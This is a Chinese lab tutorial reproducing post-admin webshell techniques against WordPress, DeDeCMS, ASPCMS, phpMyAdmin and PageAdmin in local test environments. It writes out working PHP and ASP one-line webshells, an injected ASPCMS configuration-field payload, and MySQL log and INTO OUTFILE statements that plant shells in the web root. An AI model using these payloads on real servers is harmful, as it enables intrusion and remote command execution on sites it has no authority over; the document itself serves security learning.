CMS-GetShell漏洞复现
一:WordPress环境
使用虚拟机为centos7.6
确保docker与docker-compose已安装(如果有需要大概有时间,会做一篇安装流程)
https://i-blog.csdnimg.cn/direct/7b27b9e2d211467ba49d6f1440036c37.png
下载靶场git clone https://github.com/vulhub/vulhub.git(我这里已经下载,不再演示)
进入 /vulhub/wordpress/pwnscriptum 目次下;使用命令docker-compose up -d 开启环境
https://i-blog.csdnimg.cn/direct/bda023e8e22c431a99bdeeeacda7110c.png
如果启动失败,vim docker-compose.yml修改
https://i-blog.csdnimg.cn/direct/e585311a27944dd494a2bf552b07e38c.png
将上面改为2.1,下面为端口自己随便选择一个未占用即可
https://i-blog.csdnimg.cn/direct/a2368c16bd7a4f6996b20d0cabfc5296.png
启动成功
https://i-blog.csdnimg.cn/direct/e2b92c5d1d294fb38fdf9d4b894cf302.png
方法一:配景修改模板获取shell
访问虚拟机ip加上wp-sadmin进入,进入外观-编辑-404php,在第一行添加<?php phpinfo(); ?>
在下面点击更新文件(获取shell传入一句话木马,演示使用探针)
https://i-blog.csdnimg.cn/direct/eaa7e64d2eb0406f9ff87a5d3dd0f743.png
拼接路径访问/wp-content/themes/twentyfifteen/404.php
https://i-blog.csdnimg.cn/direct/af0eabb2be1048769beed489e868dec6.png
方法二:上传主题获取shell
点击外观-主题,然后添加上传主题,在网上随便下载一个wordpress主题,将传入php与主题一同压缩为zip上传,安装
https://i-blog.csdnimg.cn/direct/9d3f0ef4325643c8ad189baa54ad6c38.png
安装成功后,拼接访问/wp-content/themes/加上上传文件以及php文件
https://i-blog.csdnimg.cn/direct/d8b4ffa1c25b44ac8ec1c41effa310e6.png
我上传为一句话木马,使用蚁剑测试连接成功
https://i-blog.csdnimg.cn/direct/fc581d7f31064cf4905527fe313b4bab.png
二:DeDeCMS
下载文件解压到小皮面板www目次下(需要文件可以私信),安装后拼接访问/uploads/dede
https://i-blog.csdnimg.cn/direct/cb75299614b245ecbff890cea6c93ad8.png
https://i-blog.csdnimg.cn/direct/d8a6e2d7aeb7454ab3cebd4e2f8e9a1f.png
方法一:通过⽂件管理器上传获取shell
登录配景后,在核心-文件式管理器,点击文件上传上传一句话木马
https://i-blog.csdnimg.cn/direct/908832a4693d4121ad942f15b9a7b518.png
测试连接,成功
https://i-blog.csdnimg.cn/direct/3d507ce2910c417d8b608a7ca0a410a7.png
方法二:修改模板文件获取shell
点击模板-默认模板管理,找到index.htm,修改保存
https://i-blog.csdnimg.cn/direct/c11e20921efd4048ad29680aa008419a.png
https://i-blog.csdnimg.cn/direct/c928d87c7b274d1fbba6f621886e390f.png
来到天生,更新主页HTML,看到主页模板没问题,天生静态,更新,欣赏
https://i-blog.csdnimg.cn/direct/f69685d23c5d4c99a969e0ba735ac8ac.png
https://i-blog.csdnimg.cn/direct/a557d967b19b4df5ac8619bdfc78a82c.png
方法三:配景任意命令执⾏获取Shell
来到模块,广告管理,增加广告,将上传木马写入广告内容当中保存
https://i-blog.csdnimg.cn/direct/36fc1a1f641d482881a1bb375310b3d2.png
添加成功后,点击代码查看位置,来到蚁剑测试连接
https://i-blog.csdnimg.cn/direct/6238adcdf4234deaa6e7687669346a2c.png
https://i-blog.csdnimg.cn/direct/5f4be82fbb7c49c2b0e04f3d80248279.png
https://i-blog.csdnimg.cn/direct/0822e65d99ae45ecbd432f5d79cadf41.png
方法四:sql写入获取shell
来到体系,sql命令行工具,输入语句指定文件天生位置,点击确定,查看
https://i-blog.csdnimg.cn/direct/1f78b3b333b04697bcec2e6d458fdeba.png
留意:使用into outfile需要mysql中my.ini中有secure_file_priv=''
https://i-blog.csdnimg.cn/direct/1f16cf3f6af843d19ac884f50a5fbc01.png
https://i-blog.csdnimg.cn/direct/dd4a1c0b32004f17af93b3ef42ad7fe9.png
三:ASPCMS
环境
下载文件,搭建在有IIS服务机器上(我使用虚拟机Windows Server 2012搭建环境)
https://i-blog.csdnimg.cn/direct/66e14370376942aab8dcc1becda3c0d0.png
将文件解压后,配置在IIS网站下(需要详细环境搭建流程私信,大概有时间会写)
https://i-blog.csdnimg.cn/direct/c56b17c530064d32afa04a54ed3c4e89.png
拼接路径/admin_aspcms,访问登录
https://i-blog.csdnimg.cn/direct/56fd07ec712d4ce28b2ddb220baa5701.png
配景修改配置⽂件获取Shell
进入后点击拓展功能->幻灯片设置->保存,用BP举行抓包
https://i-blog.csdnimg.cn/direct/27bb058819ad469ead2fe357fde11073.png
修改包中slideTextStatus 字段的值为1%25><%25Eval(Request (chr(65)))%25><%25,放完包,使用参数为chr(65),参数为ahttps://i-blog.csdnimg.cn/direct/ef993773d47143e7a2b5659791bd4026.png
https://i-blog.csdnimg.cn/direct/2981b82b0a0a4a509fc2143fbbb9c444.png
影响的文件为/config/AspCms_Config.asp,打开后可发现已经添加,使用蚁剑连接
https://i-blog.csdnimg.cn/direct/288e4fa0d48d46c4a5206c52683255db.png
https://i-blog.csdnimg.cn/direct/f36fdcf7c1ba4a15a95c595165246e9f.png
四:PHPMyadmin
环境
使用小皮面板,来到软件管理找到phpmyadmin安装,安装完成后点击管理直接打开安装
https://i-blog.csdnimg.cn/direct/a7d74413847f4adbbcd9de52b192ff23.png
方法一:通过⽇志⽂件拿Shell
登录后,点击sql输入以下语句执行
show global variables like '%general%'; https://i-blog.csdnimg.cn/direct/48b3037cb6b343c69601d51d952e5ed9.png
发现日志保存状态未开启
https://i-blog.csdnimg.cn/direct/cde0a79d74e245a286f4628cc51e9b60.png
输入以下语句执行,开启日志保存状态
set global general_log='on'; 再次查看状态,已经开启
https://i-blog.csdnimg.cn/direct/59cdfd046ada4a9bb21102821469e85c.png
使用命令更改日志保存位置,查看是否成功
set global general_log_file = 'E:/phpStudy/phpstudy_pro/WWW/1.php' https://i-blog.csdnimg.cn/direct/2c7099438f134812abbdd0d4abb72686.png
https://i-blog.csdnimg.cn/direct/27454f3f370541f8b0c506a80ddf86b7.png
使用语句将木马写入,使用蚁剑测试连接
select '<?php eval($_POST["cmd"]);?>'; https://i-blog.csdnimg.cn/direct/44e25f173da041079f1eb1f56c92c9c3.png
方法二:导⼊导出获取Shell
通过sql语句判断目次,使用into outfile写入(使用条件看DeDeCMS方法四)
判断mysql位置使用命令
select @@datadir https://i-blog.csdnimg.cn/direct/d011f1e535a0401cb96faf64f9a269eb.png
www路径应当为E:/phpStudy/phpstudy_pro/www若不精确,举行删减判断,写入木马
select "<?php eval($_POST);?>" into outfile 'E:/phpStudy/phpstudy_pro/www/2.php'; 执行成功代表路径判断精确(包管目次下没有同名文件,否则会报错),蚁剑连接
https://i-blog.csdnimg.cn/direct/705f84ee7f084a5289794efa349550c8.png
https://i-blog.csdnimg.cn/direct/27fa8a8e5fff4392be1d33c469e44756.png
方法三:界面图像化获取Shell
如果第一种方法无法使用into outfile时,通过此方法修改日志举行sql写入木马
点击变量,搜索输入gen来搜索日志
https://i-blog.csdnimg.cn/direct/2c446f001ff747b8bc756f8699ef3845.png
sql写入,蚁剑连接
select "<?php eval($_POST);?>"; https://i-blog.csdnimg.cn/direct/fa36f388f2f5428ba051c993f8647f5d.png
https://i-blog.csdnimg.cn/direct/0fdc372d19fe4103bc86bbfd0ac22588.png
Pageadmin
环境同ASPCMS一样,下载安装于IIS,安装后,拼接admin,进入管理员页面
https://i-blog.csdnimg.cn/direct/7b06059dc29441968960f5f6d2b3ceb1.png
https://i-blog.csdnimg.cn/direct/943750a253ce4f74af3caf492d6fbf92.png
方法一:上传模块得到Shell
来到应用,插件安装上传一个含有木马的zip,若为授权版本会上传成功主动解压,直接连接即可
https://i-blog.csdnimg.cn/direct/739b6178437f4f6a81355269baf219ad.png
方法二:上传⽂件解压拿WebShell
来到工具,文件管理上传带有一句话木马的zip,留意使用一句话木马为asp格式,内容为
<%eval request("pass")%>
<%eval request("pass")%> https://i-blog.csdnimg.cn/direct/4d890d9e7b4a4252bc3e48f2cf602afd.png
https://i-blog.csdnimg.cn/direct/faf1f3279dfc43108a57ad202f7deb9a.png
找到后解压,使用蚁剑连接
https://i-blog.csdnimg.cn/direct/a9028f93ce954155915ba6feeaa89a5f.png
此漏洞复现结束,如有疑问或是问题提出欢迎讨论
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]